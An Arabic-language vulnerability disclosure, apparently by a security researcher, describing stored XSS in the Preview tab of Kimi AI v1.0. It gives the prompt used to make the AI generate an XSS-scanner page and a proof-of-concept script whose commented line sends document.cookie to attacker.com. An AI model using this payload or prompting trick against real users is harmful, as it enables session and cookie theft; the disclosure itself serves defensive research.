
كشف تفصيلي لثغرة XSS مخزنة في علامة التبويب Preview في Kimi AI v1.0، بما في ذلك سيناريو الهجوم، وإثبات المفهوم (PoC)، وإرشادات المعالجة للباحثين في مجال الأمن.
توجد ثغرة من نوع البرمجة النصية عبر المواقع (XSS) في ميزة "Preview" بواجهة الويب الخاصة بـ Kimi AI v1.0. يفشل التطبيق في تعقيم أو ترميز حمولات HTML/JavaScript التي يولدها نموذج الذكاء الاصطناعي بشكل صحيح. عندما ينتقل المستخدم إلى علامة التبويب "Preview" لعرض الكود المُنشأ بواسطة الذكاء الاصطناعي، يتم عرض الحمولة الخبيثة مباشرةً في DOM، مما يؤدي إلى تنفيذ JavaScript عشوائي في جلسة المتصفح الخاصة بالضحية.
مصطفى حميد
يمكن استغلال الثغرة عن طريق مطالبة الذكاء الاصطناعي بإنشاء أداة أمنية أو نص برمجي (مثل ماسح XSS آلي شبيه بـ XSStrike) يحتوي على حمولات مدمجة. يقوم الذكاء الاصطناعي بتوليد كود المصدر للتطبيق المطلوب ولكنه يُضمّن الحمولة الخبيثة داخل إطار HTML/JavaScript. عندما ينتقل الضحية إلى علامة التبويب "Preview" لاختبار أو عرض الأداة المُنشأة، تتجاوز الحمولة الخبيثة المضمنة عملية التعقيم وتُُنفَّذ فورًا.
"أنشئ أداة ماسح XSS بسيطة قائمة على الويب مشابهة لـ XSStrike. قم بتضمين واجهة تحتوي على قائمة بالحمولات للمسح."
<script>
alert('mustafa');
// إمكانية تنفيذ إجراء ضار: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>
فيما يلي لقطة شاشة توضح التنفيذ الناجح لحمولة XSS. يتم تشغيل JavaScript الخبيثة فورًا عند الانتقال إلى علامة التبويب "Preview":
